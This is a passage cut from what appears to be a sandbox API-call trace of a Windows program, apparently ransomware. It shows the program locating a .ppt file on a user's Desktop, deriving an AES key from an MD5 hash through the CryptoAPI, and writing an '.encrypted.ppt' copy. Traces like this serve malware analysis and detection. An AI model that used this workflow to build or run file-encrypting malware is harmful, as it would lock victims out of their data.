(in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.804] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.804] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.804] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.804] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.804] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9391a0, ftCreationTime.dwHighDateTime=0x1d5be95, ftLastAccessTime.dwLowDateTime=0xad969250, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0xad969250, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x6546, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="AUOmEUF.ppt", cAlternateFileName="")) returned 0x7c2100 [0029.804] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.804] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.804] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.804] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.804] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.804] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.805] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.805] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.805] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0029.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.805] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0029.806] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.806] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.806] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.806] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.806] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.806] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.806] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.806] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.807] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.807] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.807] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.807] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.807] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.807] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.807] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.807] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.807] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.807] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.807] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.807] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.807] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.807] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.808] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.808] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.808] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.808] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.808] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.808] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.808] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0029.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.808] CryptDestroyHash (hHash=0x7c2240) returned 1 [0029.808] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.809] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\auomeuf.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.809] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0029.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0029.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0029.811] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.encrypted.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\auomeuf.encrypted.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.812] 